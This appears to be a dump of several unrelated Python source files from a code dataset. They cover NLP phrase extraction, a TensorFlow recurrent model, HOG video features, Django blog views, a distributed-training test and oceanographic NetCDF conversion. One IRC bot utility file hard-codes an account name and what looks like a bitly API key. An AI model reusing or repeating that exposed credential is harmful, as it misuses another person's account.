datetime import date, timedelta\nfrom nltk.tag import pos_tag\nimport nltk\n\n\ndef phrase_frequencies():\n phrase_path = \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Common_Phrases/\"\n\n phrases_dict = dict()\n\n for week_num in range(2, 53):\n most_commons = tools.load_pickle(phrase_path + \"2015-\" + str(week_num) + \"_common_phrases.pickle\")\n for phrase_tuple in most_commons:\n if phrase_tuple[0] in phrases_dict:\n phrases_dict[phrase_tuple[0]] += phrase_tuple[1]\n else:\n phrases_dict[phrase_tuple[0]] = phrase_tuple[1]\n\n for week_num in range(1, 52):\n most_commons = tools.load_pickle(phrase_path + \"2016-\" + str(week_num) + \"_common_phrases.pickle\")\n for phrase_tuple in most_commons:\n if phrase_tuple[0] in phrases_dict:\n phrases_dict[phrase_tuple[0]] += phrase_tuple[1]\n else:\n phrases_dict[phrase_tuple[0]] = phrase_tuple[1]\n\n sorted_by_value = sorted(phrases_dict.items(), key=lambda kv: kv[1])\n sorted_by_value.reverse()\n\n\ndef flat_to_weeks():\n doc_ids_flat = list()\n entity_struct_flat = list()\n start_day = date(2016, 1, 4)\n\n for idx in range(0, 51):\n week_ids_flat = list()\n week_struct_flat = list()\n week_start_day = start_day + timedelta(idx*7)\n current_week = str(week_start_day.isocalendar()[0]) + \"-\" + str(week_start_day.isocalendar()[1])\n for current_date in (week_start_day + timedelta(n) for n in range(7)):\n string_date = str(current_date.year) + \"-\" + str(current_date.month) + \"-\" + \\\n str(current_date.day)\n\n day_ids = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/Pivot_Files/Document_ids/\"\n + current_week + \"/\" + string_date + \"_doc_ids.pickle\")\n day_structs = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/Pivot_Files/\"\n \"Article_Entity_Structure/\" + current_week + \"/\" + string_date\n + \"_DictArticlesList.pickle\")\n week_ids_flat += list(day_ids)\n week_struct_flat += list(day_structs)\n doc_ids_flat.append(week_ids_flat)\n entity_struct_flat.append(week_struct_flat)\n return doc_ids_flat, entity_struct_flat\n\n\ndef number_stop_phrase(phrase):\n is_stop_phrase = False\n\n for word in phrase[0].split():\n if all(char.isdigit() for char in word):\n is_stop_phrase = True\n break\n return is_stop_phrase\n\n\ndef word_stop_phrase(phrase):\n is_stop_phrase = False\n stop_words = {\"year\", \"years\", \"percent\", \"million\", \"millions\", \"billion\",\n \"billions\", \"week\", \"weeks\", \"day\", \"days\"}\n\n for word in phrase[0].split():\n if word in stop_words:\n is_stop_phrase = True\n break\n return is_stop_phrase\n\n\ndef clean_phrases():\n stop_phrases = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/\"\n \"stop_phrases.pickle\")\n\n for week_index in range(0, 45):\n print(\"Working on week:\", str(week_index))\n common_phrases = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"old/2016-\" + str(week_index + 7) + \"_common_phrases.pickle\")\n cleaned_phrases = list()\n for c_phrase in common_phrases:\n if c_phrase[0] not in stop_phrases:\n if not number_stop_phrase(c_phrase):\n if not word_stop_phrase(c_phrase):\n cleaned_phrases.append(c_phrase)\n tools.save_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Common_Phrases/2016-\" + str(week_index + 7) + \"_common_phrases.pickle\", cleaned_phrases)\n\n\n# Common phrases from the ToPmine algorithm\ndef sentence_common_phrases(list_of_sents, c_phrases):\n all_sent_phrases = list()\n for idx, sentence in enumerate(list_of_sents):\n sent_phrases = list()\n for com_phrase in c_phrases:\n if com_phrase[0] in sentence:\n sent_phrases.append(com_phrase[0])\n all_sent_phrases.append(sent_phrases)\n return all_sent_phrases\n\n\ndef noun_phrases(n_sentence):\n for subtree in n_sentence.subtrees():\n if subtree.label() == 'NP':\n yield ' '.join(word for word, tag in subtree.leaves())\n\n\n# Noun phrases from the idf/parser approach\ndef sentence_noun_phrases(list_of_sents, n_dict):\n all_sent_phrases = list()\n grammar = \"\"\"NP: {
?*+}\n RELATION: {}\n {
?*+}\n ENTITY: {}\"\"\"\n\n for sentence in list_of_sents:\n sent_phrases = list()\n tagged_sent = pos_tag(sentence.split())\n cp = nltk.RegexpParser(grammar)\n parsed_sent = cp.parse(tagged_sent)\n for n_phrase in noun_phrases(parsed_sent):\n if n_phrase in n_dict:\n sent_phrases.append(n_phrase)\n all_sent_phrases.append(sent_phrases)\n\n return all_sent_phrases\n\n\ndef add_phrases_to_struct(t_struct, p_key):\n for idx, p_sent in enumerate(p_key):\n t_struct[idx][\"N\"] = p_sent\n return t_struct\n\n\ndef merge_phrases_to_struct(t_struct, p_key, n_key):\n for idx, (p_sent, n_sent) in enumerate(zip(p_key, n_key)):\n merged_sent = list(set(p_sent + n_sent))\n t_struct[idx][\"N\"] = merged_sent\n return t_struct\n\n# !!!!TODO bug with doc_index = doc_ids[week_index].index(peak_doc) I need to rewrite the add phrases procedure\ndef add_phrase_entities():\n # Noun dictionary\n noun_dict = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/\"\n \"KeyGraph_Approach/Pivot_Files/noun_idf_dict_tt.pickle\")\n # Year\n peak_doc_ids = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/\"\n \"ids_of_peaking_docs.pickle\")\n doc_ids, entity_struct = flat_to_weeks()\n new_entity_struct = list()\n peaking_ids = list()\n\n # In peak_doc_ids we have the peaking documents from week 7 until week 51\n for week_index in range(0, 45):\n print(\"Working on week:\" + str(week_index + 7))\n week_sents = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Week_docs_sentences_per_day/2016-\" + str(week_index + 7) + \"sents_of_doc.pickle\")\n common_phrases = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Common_Phrases/2016-\" + str(week_index + 7) + \"_common_phrases.pickle\")\n week_entity_struct = list()\n week_peak_ids = list()\n for peak_doc in peak_doc_ids[week_index]:\n week_peak_ids.append(peak_doc)\n doc_index = doc_ids[week_index].index(peak_doc)\n phrase_key = sentence_common_phrases(week_sents[doc_index], common_phrases)\n noun_key = sentence_noun_phrases(week_sents[doc_index], noun_dict)\n temp_struct = entity_struct[week_index][doc_index]\n # temp_struct = add_phrases_to_struct(temp_struct, phrase_key)\n temp_struct = merge_phrases_to_struct(temp_struct, phrase_key, noun_key)\n week_entity_struct.append(temp_struct)\n peaking_ids.append(week_peak_ids)\n new_entity_struct.append(week_entity_struct)\n\n tools.save_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Pivot_Files/entity_merged_struct.pickle\", new_entity_struct)\n tools.save_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Pivot_Files/week_peak_ids.pickle\", peaking_ids)\n\n\ndef check_nouns():\n noun = tools.load_pickle(\n \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/entity_noun_struct.pickle\")\n phrase = tools.load_pickle(\n \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/entity_phrase_struct.pickle\")\n merged = tools.load_pickle(\n \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/entity_merged_struct.pickle\")\n print()\n flag = True\n while flag:\n num = int(input(\"Give week:\"))\n num2 = int(input(\"Give index\"))\n a_noun = noun[num][num2]\n b_phrase = phrase[num][num2]\n c_merged = merged[num][num2]\n print()\n\n\nif __name__ == \"__main__\":\n # phrase_frequencies()\n add_phrase_entities()\n # clean_phrases()\n # a = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n # \"Pivot_Files/entity_merged_struct.pickle\")\n # b = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n # \"Pivot_Files/week_peak_ids.pickle\")\n print()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"KeyGraph_Approach/pivot_functions.py","file_name":"pivot_functions.py","file_ext":"py","file_size_in_byte":9071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"482478848","text":"import tensorflow as tf\nimport tensorflow.keras.layers as tfkl\nfrom tensorflow_probability import distributions as tfd\nfrom tensorflow.keras.mixed_precision import experimental as prec\n\nfrom rrl_praktikum.models.base_module import Module\nfrom rrl_praktikum.utilities import tools\n\n\nclass RecurrentModel(Module):\n def __init__(self, deter=200, hidden=200, act=tf.nn.elu):\n super().__init__()\n self._activation = act\n self._deter_size = deter\n self._hidden_size = hidden\n self._cell = tfkl.GRUCell(self._deter_size)\n\n def initial(self, batch_size):\n dtype = prec.global_policy().compute_dtype\n return dict(\n deter=self._cell.get_initial_state(None, batch_size, dtype))\n\n @tf.function\n def observe(self, embed, action, state=None):\n if state is None:\n state = self.initial(tf.shape(action)[0])\n embed = tf.transpose(embed, [1, 0, 2])\n action = tf.transpose(action, [1, 0, 2])\n post, _ = tools.static_scan(\n lambda prev, inputs: self.obs_step(prev[0], *inputs),\n (action, embed), (state, state))\n post = {k: tf.transpose(v, [1, 0, 2]) for k, v in post.items()}\n return post, None\n\n @tf.function\n def imagine(self, action, state=None):\n if state is None:\n state = self.initial(tf.shape(action)[0])\n assert isinstance(state, dict), state\n action = tf.transpose(action, [1, 0, 2])\n prior = tools.static_scan(self.img_step, action, state)\n prior = {k: tf.transpose(v, [1, 0, 2]) for k, v in prior.items()}\n return prior\n\n def get_feat(self, state):\n return state['deter']\n\n @tf.function\n def obs_step(self, prev_state, prev_action, embed):\n x = tf.concat([prev_action, embed], -1)\n x = self.get('obs1', tfkl.Dense, self._hidden_size, self._activation)(x)\n x, deter = self._cell(x, [prev_state['deter']])\n deter = deter[0] # Keras wraps the state in a list.\n state = {'deter': deter}\n return state, state\n\n @tf.function\n def img_step(self, prev_state, prev_action):\n x = prev_action\n x = self.get('img1', tfkl.Dense, self._hidden_size, self._activation)(x)\n x, deter = self._cell(x, [prev_state['deter']])\n deter = deter[0] # Keras wraps the state in a list.\n state = {'deter': deter}\n return state\n","sub_path":"rrl_praktikum/models/recurrent_model.py","file_name":"recurrent_model.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349330957","text":"import htmllib\nimport bitly_api\n\ndef unescape(s):\n p = htmllib.HTMLParser(None)\n p.save_bgn()\n p.feed(s)\n return p.save_end()\n\ndef rainbowify(s,shift=2):\n return ''.join(map(lambda x: chr(3) + str(x[0]+shift) + ',' + str(x[0]) + x[1], enumerate(s)))\n \nbitly = bitly_api.Connection(\n 'voxinfinitus', \n 'R_d3664470e5404623b5c0e3a25a873286', \n )\n\n","sub_path":"voxbot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"518484669","text":"#-*- coding:utf-8 -*-\n\n__author__ = 'wangjf'\n\n\ndef sum1(L):\n if not L:\n return None\n first , *arg = L\n return first if not arg else first + sum1(arg)\n\nL = [1,2,3,4,5]\nprint(sum1(L))\nprint(sum1([]))","sub_path":"Learn_python/chapter19/19.1_sum.py","file_name":"19.1_sum.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"71766051","text":"import numpy as np\nimport cv2\nfrom scipy.spatial.distance import norm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\n\ndef norm1d(vec):\n\n\tnormalizer =norm(vec,2)\n\tif normalizer > 0:\n\t\treturn vec/normalizer\n\telse:\n\t\treturn np.zeros_like(vec)\n\n\n\ndef compute_hog(cont,cube_size,block_size,bins,gradient_par=False):\n\t\"\"\"\n\tExtract words from a given video chunk\n\n\tParameters\n\t----------\n\tcont: sub part of a video or gradient image.\n\tcube_h : height of the cube\n\tcube_w : width of the cube\n\tcube_t : temporal dimension of the cube\n\thog_bins : number of hog orientations\n\tgradient_par = True : gradient are provided\n\t\t\t\t\tFalse: original video is provides\n\t\"\"\"\n\tchnk_angle = None\n\tchnk_mag = None\n\tgrad_x = None\n\tgrad_y = None\n\tcube_t,cube_h,cube_w = cube_size\n\tblock_t,block_h,block_w = block_size\n\n\tif gradient_par is True:\n\t\tgrad_x,grad_y = (cont[...,0],cont[...,1])\n\telse:\n\t\tgrad_x,grad_y = compute_gradients(cont)\n\n\n\tT,H,W = grad_x.shape\n\n\t#Compute quatized gradients direction, and their magnitutes\n\tfor i in range(T):\n\t\tg_x = grad_x[i]\n\t\tg_y = grad_y[i]\n\t\tif chnk_angle is None:\n\t\t\tchnk_angle = np.arctan2(g_y, g_x)[None,:,:]\n\t\t\tchnk_mag = np.sqrt(g_y**2 + g_x**2)[None,:,:]\n\t\telse:\n\t\t\tchnk_angle = np.concatenate((chnk_angle, np.arctan2(g_y, g_x)[None,:,:]),axis=0)\n\t\t\tchnk_mag = np.concatenate((chnk_mag, np.sqrt(g_y**2 + g_x**2)[None,:,:]),axis=0)\n\n\tchnk_angle = np.where(chnk_angle <= 0, chnk_angle + np.pi, chnk_angle)\n\tpiconst = bins/np.pi\n\tchnk_angle = np.ceil(piconst * chnk_angle)\n\n\t#Compute integral histogram, FIRST INDECIES ARE ALWAYS ZERO\n\t#A cube shell of zero values around the integral histogram is needed to calculate it right[its probabile that iam wrong]\n\tintegral_histogram = np.zeros((chnk_angle.shape[0]+2, chnk_angle.shape[1]+2,chnk_angle.shape[2]+2, bins))\n\tfor i in range(bins):\n\n\t\tintegral_histogram[1:-1,1:-1,1:-1,i] = np.where(chnk_angle==i+1, chnk_mag, 0)\n\t\tintegral_histogram[...,i] = np.cumsum(np.cumsum(np.cumsum(integral_histogram[...,i],axis=0),axis=1),axis=2)\n\n\tchnk_cells = []\n\t#----------------------------------\n\tA = integral_histogram[1:-cube_t , cube_h+1:, 1:-cube_w ,: ]\n\tB = integral_histogram[1:-cube_t , cube_h+1:, cube_w+1: ,:]\n\tC = integral_histogram[ cube_t+1:, cube_h+1:, 1:-cube_w,: ]\n\tD = integral_histogram[ cube_t+1:, cube_h+1:, cube_w+1:,: ]\n\n\tcube_histogram = A + D - C - B\n\tcube_hist_t , cube_hist_h , cube_hist_w = grad_x.shape\n\n\n\tstep_t = cube_t*block_t\n\tstep_h = cube_h*block_h\n\tstep_w = cube_w*block_w\n\n\trange_t = step_t*(cube_hist_t/step_t)\n\trange_h = step_h*(cube_hist_h/step_h)\n\trange_w = step_w*(cube_hist_w/step_w)\n\n\n\n\tcube_histogram_mesh = [np.mgrid[#Generate the local grid of cubes histogram\n\t\t\t\t\t\t\t\tt : t+step_t : cube_t,\n\t\t\t\t\t\t\t\tx : x+step_h : cube_h,\n\t\t\t\t\t\t\t\ty : y+step_w : cube_w,\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\tfor t in range(0,range_t,step_t)#define the starting points of each\n\t\t\t\t\t\tfor x in range(0,range_h,step_h)#block that contains cubes histograms\n\t\t\t\t\t\tfor y in range(0,range_w,step_w)#values, CRITICAL but NEEDED\n\n\t\t\t\t\t\t]\n\n\tblock_cubes_hog = np.asarray([cube_histogram[grid[0],grid[1],grid[2],:] for grid in cube_histogram_mesh])\n\tblock_cubes_hog = block_cubes_hog.reshape(block_cubes_hog.shape[0],-1)\n\tblock_cubes_hog = np.apply_along_axis(norm1d,1,block_cubes_hog)\n\treturn block_cubes_hog\n\n\n\n\ndef compute_gradients(v_chnk):\n\tgrad = [np.gradient(v_chnk[i,...]) for i in range(v_chnk.shape[0])]\n\tgrad_x,grad_y = zip(*grad)\n\treturn np.asarray(grad_x) , np.asarray(grad_y)\n\n\ndef main():\n\tcell = np.random.randint(10,size=(32,32,32))\n\tcompute_hog(cell,[8,8,8], [2,2,2],8,False)\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n","sub_path":"MyCode/features/Temporal_features.py","file_name":"Temporal_features.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570708992","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.views.generic import View, ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import FormView\nfrom django.views.generic.base import TemplateView, TemplateResponseMixin, ContextMixin\nfrom artigos.models import Artigo\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.models import User\nfrom artigos.forms import *\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\n\n\n#hierarquia de classes do django:\n#View - Classe mae de todas as outras classes\n#TemplateView - Classe que tem como metodos principais : ContextMixin, TemplateResponseMixin, View\n\n#exemplo de function based view\n#def ola(request):\n# return render(request, 'index.html')\n\n#classe para login_required - it is not working\nclass LoginRequiredMixin(object):\n\n @classmethod\n def as_view(cls, **kwargs):\n view = super(LoginRequiredMixin, cls).as_view(**kwargs)\n return login_required(view)\n\n#ContextMixin, TemplateResponseMixin,View\nclass Principal(TemplateView):\n template_name = \"index.html\"\n form_class = FormPesquisa\n\n #passando um context para a pagina principal para TemplateView\n #def get_context_data(self, *args, **kwargs):\n # context = super(Principal, self).get_context_data(**kwargs)\n # context['title'] = \"About us\"\n # return context\n\n #para usar o render_to_response temos que herdar esse metodo do ContextMixin e TemplateResponseMixin\n # def get(self, request, *args, **kwargs):\n # context = self.get_context_data(**kwargs)\n # context['usuario'] = request.user\n # return self.render_to_response(context)\n\n #TemplateView, View\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {'form':self.form_class})\n\n def post(self,request, *args, **kwargs):\n form = self.form_class(request.POST)\n if form.is_valid():\n q = form.cleaned_data['lupa']\n resultado = Artigo.objects.filter(titulo__contains=q)\n return render(request, self.template_name, {'form':self.form_class, 'artigo':resultado})\n\n#exemplo de class based view\n#retirado de listview para que possamos passar o usuario\nclass Posts(LoginRequiredMixin, ListView):\n template_name='posts.html'\n context_object_name = 'artigos'\n paginate_by = 3\n\n def get_queryset(self):\n return Artigo.objects.all()\n\nclass MenuFiltroPosts(LoginRequiredMixin, ListView):\n template_name='posts.html'\n context_object_name = 'artigos'\n paginate_by = 2\n\n #exemplo de como pegar o slug field do urls\n # def get(self, request, *args, **kwargs):\n # artigo = Artigo.objects.filter(titulo__contains= kwargs['slug'])\n # paginator = Paginator(artigo, 1)\n # page = request.GET.get('page')\n # artigo = paginator.get_page(page)\n # return render(request, self.template_name, {'artigos':artigo})\n\n def get_queryset(self):\n slug = self.kwargs['slug']\n return Artigo.objects.filter(titulo__contains=slug)\n\n\nclass Contato(LoginRequiredMixin, FormView, TemplateView):\n template_name = \"contato.html\"\n form_class = FormContato\n success_url = 'http://programblog.life'\n\n def form_valid(self, form):\n return super(Login, self).form_valid(form)\n \n\n def post(self, request, *args, **kwargs):\n pass\n\n #def get(self, request, *args, **kwargs):\n #return render(request, self.template_name)\n\n#Antes usado omo detailView\nclass ArtigoDetalhes(LoginRequiredMixin, TemplateView):\n model = Artigo\n #slug_field = 'pk'\n #context_object_name = 'artigo'\n template_name = 'detail.html'\n\n # def get_context_data(self,**kwargs):\n # context = super(ArtigoDetalhes,self).get_context_data(**kwargs)\n # return context\n\n def get(self, request, *args, **kwargs):\n consulta = Artigo.objects.get(id = kwargs['pk'])\n return render(request, self.template_name, {'artigo':consulta})\n\nclass Login(FormView):\n template_name = \"login.html\"\n form_class = Formlogin\n success_url = 'http://programblog.life'\n\n def form_valid(self, form):\n return super(Login, self).form_valid(form)\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n flag_nao_autorizado = False\n # estado = \"vazio\"\n if form.is_valid():\n usuario = form.cleaned_data['usuario']\n senha = form.cleaned_data['senha']\n user = authenticate(username=usuario, password=senha)\n if user is not None:\n if user.is_active:\n if user.is_staff:\n login(request, user)\n return redirect('http://programblog.life/')\n else:\n flag_nao_autorizado = True\n else:\n flag_nao_autorizado = True\n else:\n flag_nao_autorizado = True\n\n return render(request, self.template_name, {'form':self.form_class, 'nao_permitido':flag_nao_autorizado})\n\n# class Procurar(FormView):\n# template_name = 'index.html'\n# form_class = FormPesquisa\n# success_url = 'http://127.0.0.1:8000/pesquisa'\n#\n# def form_valid(self, form):\n# email = form.cleaned_data['email']\n# return super(Procurar, self).form_valid(form)\n#\n# def post(self, request, *args, **kwargs):\n# pass\n\n\nclass Logout(TemplateView):\n template_name = 'logout.html'\n\n def get(self, request, *args, **kwargs):\n logout(request)\n return render(request, self.template_name)\n\nclass Cadastro(FormView):\n template_name = \"cadastro.html\"\n form_class = FormCadastro\n success_url = 'http://programblog.life'\n\n def form_valid(self, form):\n return super(Login, self).form_valid(form)\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n if form.is_valid():\n usuario = form.cleaned_data['usuario']\n email = form.cleaned_data['email']\n senha1 = form.cleaned_data['senha1']\n senha2 = form.cleaned_data['senha2']\n if (senha1 == senha2):\n valida = True\n else:\n valida = False\n\n if (valida):\n try:\n user = User.objects.create_user(usuario, email, senha1)\n user.is_staff = False\n user.save()\n login(request, user)\n except Exception as err:\n erro = err\n\n return redirect('http://programblog.life')\n else:\n erro = \"Senha invalida\"\n\n return render(request, self.template_name, {'form':self.form_class, 'erro':erro})\n","sub_path":"artigos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"46866965","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('generators', '0004_generator_user'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='generator',\n name='created_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 6, 12, 16, 2, 44, 649847, tzinfo=utc), verbose_name=b'date created'),\n ),\n migrations.AddField(\n model_name='generator',\n name='update_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 6, 12, 16, 2, 44, 649888, tzinfo=utc), verbose_name=b'last updated'),\n ),\n ]\n","sub_path":"Generator/generators/migrations/0005_auto_20150612_1602.py","file_name":"0005_auto_20150612_1602.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"99640043","text":"import torch\nimport torch.distributed as dist\nfrom torch.nn import Parameter\nfrom torch.nn import Module\nfrom apex.parallel import DistributedDataParallel as DDP\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='allreduce hook example')\nparser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,\n help='url used to set up distributed training')\nparser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend')\nparser.add_argument('--world-size', default=1, type=int,\n help='Number of GPUs to use. Can either be manually set ' +\n 'or automatically set by using \\'python -m multiproc\\'.')\nparser.add_argument('--rank', default=0, type=int,\n help='Used for multi-process training. Can either be manually set ' +\n 'or automatically set by using \\'python -m multiproc\\'.')\n\nargs = parser.parse_args()\n\nargs.distributed = args.world_size > 1\n\nif args.distributed:\n torch.cuda.set_device(args.rank % torch.cuda.device_count())\n dist.init_process_group(args.dist_backend, init_method=args.dist_url,\n world_size=args.world_size)\n rank = torch.distributed.get_rank()\ntorch.set_printoptions(precision=10)\n\nclass Model(Module):\n def __init__(self):\n super(Model, self).__init__()\n self.x = Parameter(torch.cuda.FloatTensor(1,4096*4096).fill_(1.0))\n def forward(self, input):\n return self.x*input\nmodel = DDP(Model(), message_size=1)\n\nz = torch.cuda.FloatTensor(4096*4096)\n\nfor i in range(10):\n z.fill_(i + rank) # fill z with new values every iteration for sanity\n model.zero_grad()\n out = model(z)\n loss = out.sum()\n torch.cuda.nvtx.range_push(\"backward\")\n loss.backward()\n torch.cuda.nvtx.range_pop()\n \n torch.cuda.nvtx.range_push(\"synchronize() + sum\")\n torch.cuda.synchronize()\n for param in model.parameters():\n print(\"i = {},\\n\"\n \"param.grad.data_ptr() = {}\\n\"\n \"expected {},\\n\" \n \" got {}\\n\"\n .format(i,\n param.grad.data_ptr(),\n 4096*4096*(2.*i+1)/2.,\n param.grad.data.sum().item()))\n torch.cuda.nvtx.range_pop()\n\n","sub_path":"tests/distributed/ddp_race_condition_test.py","file_name":"ddp_race_condition_test.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"479874087","text":"import os\nimport sys\nimport glob\nfrom multiprocessing import Process\nfrom time import time\nimport cioos_data_transform.IosObsFile as ios\nfrom write_ctd_ncfile import write_ctd_ncfile\nfrom write_cur_ncfile import write_cur_ncfile\nfrom write_mctd_ncfile import write_mctd_ncfile\n\n# .cioos_data_transform as iod\nimport cioos_data_transform.utils as cioos_utils\nimport subprocess\n\n\ndef convert_files(env_vars, opt=\"all\", ftype=None):\n # path of raw files, path for nc files, and option\n # opt = 'new' for only new raw files\n # opt = 'all' for all files. default value;\n # ftype = 'ctd' for CTD profiles\n # 'mctd' for mooring CTDs\n # 'cur' for current meters\n print(\"Option, ftype =\", opt, ftype)\n if ftype == \"ctd\":\n in_path = env_vars[\"ctd_raw_folder\"]\n out_path = env_vars[\"ctd_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = glob.glob(in_path + \"**/*.[Cc][Tt][Dd]\", recursive=True)\n elif ftype == \"mctd\":\n in_path = env_vars[\"mctd_raw_folder\"]\n out_path = env_vars[\"mctd_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = []\n flist.extend(glob.glob(in_path + \"**/*.[Cc][Tt][Dd]\", recursive=True))\n flist.extend(glob.glob(in_path + \"**/*.mctd\", recursive=True))\n elif ftype == \"bot\":\n in_path = env_vars[\"bot_raw_folder\"]\n out_path = env_vars[\"bot_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = []\n flist.extend(glob.glob(in_path + \"**/*.[Bb][Oo][Tt]\", recursive=True))\n flist.extend(glob.glob(in_path + \"**/*.[Cc][Hh][Ee]\", recursive=True))\n elif ftype == \"cur\":\n in_path = env_vars[\"cur_raw_folder\"]\n out_path = env_vars[\"cur_nc_folder\"]\n fgeo = env_vars[\"geojson_file\"]\n flist = glob.glob(in_path + \"**/*.[Cc][Uu][Rr]\", recursive=True)\n else:\n print(\"ERROR: Filetype not understood ...\")\n return None\n print(\"Total number of files =\", len(flist))\n # loop through files in list, read the data and write netcdf file if data read is successful\n for i, fname in enumerate(flist[:]):\n # print('\\nProcessing -> {} {}'.format(i, fname))\n p = Process(\n target=(convert_files_threads), args=(ftype, fname, fgeo, out_path)\n )\n p.start()\n p.join()\n return flist\n\n\ndef standardize_variable_names(ncfile):\n # input: netcdf file with non-standard variable names\n # output: netcdf file with standard variables added\n # NOTE: netcdf files are overwritten\n print(f\"Adding standard variables:{ncfile}\")\n cioos_utils.add_standard_variables(ncfile)\n\n\ndef convert_files_threads(ftype, fname, fgeo, out_path):\n # skip processing file if its older than 24 hours old\n if cioos_utils.file_mod_time(fname) < -24.0 and opt == \"new\":\n # print(\"Not converting file: \", fname)\n return 0\n print(\"Processing {} {}\".format(ftype, fname))\n # read file based on file type\n if ftype == \"ctd\":\n fdata = ios.CtdFile(filename=fname, debug=False)\n elif ftype == \"mctd\":\n fdata = ios.MCtdFile(filename=fname, debug=False)\n elif ftype == \"bot\":\n fdata = ios.CtdFile(filename=fname, debug=False)\n elif ftype == \"cur\":\n fdata = ios.CurFile(filename=fname, debug=False)\n else:\n print(\"Filetype not understood!\")\n sys.exit()\n # if file class was created properly, try to import data\n if fdata.import_data():\n print(\"Imported data successfully!\")\n fdata.assign_geo_code(fgeo)\n # now try to write the file...\n yy = fdata.start_date[0:4]\n if not os.path.exists(out_path + yy):\n os.mkdir(out_path + yy)\n ncFileName = out_path + yy + \"/\" + fname.split(\"/\")[-1] + \".nc\"\n if ftype == \"ctd\":\n try:\n write_ctd_ncfile(ncFileName, fdata)\n standardize_variable_names(ncFileName)\n except Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n elif ftype == \"mctd\":\n try:\n write_mctd_ncfile(ncFileName, fdata)\n standardize_variable_names(ncFileName)\n except Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n elif ftype == \"bot\":\n try:\n write_ctd_ncfile(ncFileName, fdata)\n standardize_variable_names(ncFileName)\n except Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n elif ftype == \"cur\":\n try:\n write_cur_ncfile(ncFileName, fdata)\n except Exception as e:\n print(\"Error: Unable to create netcdf file:\", fname, e)\n subprocess.call([\"rm\", \"-f\", ncFileName])\n else:\n print(\"Error: Unable to import data from file\", fname)\n return 0\n\n\n# read inputs if any from the command line\n# first input is 'all' or 'new' for processing all files or just files newer than 24 hours\n# second input is file type and is one of ['ctd','mctd', 'cur', 'bot']\nif len(sys.argv) > 1:\n opt = sys.argv[1].strip().lower()\n ftype = sys.argv[2].strip().lower()\nelse: # default option. process all files !\n opt = \"all\"\n ftype = \"ctd\"\nconfig = cioos_utils.read_config(\"config.json\")\n# env_vars = 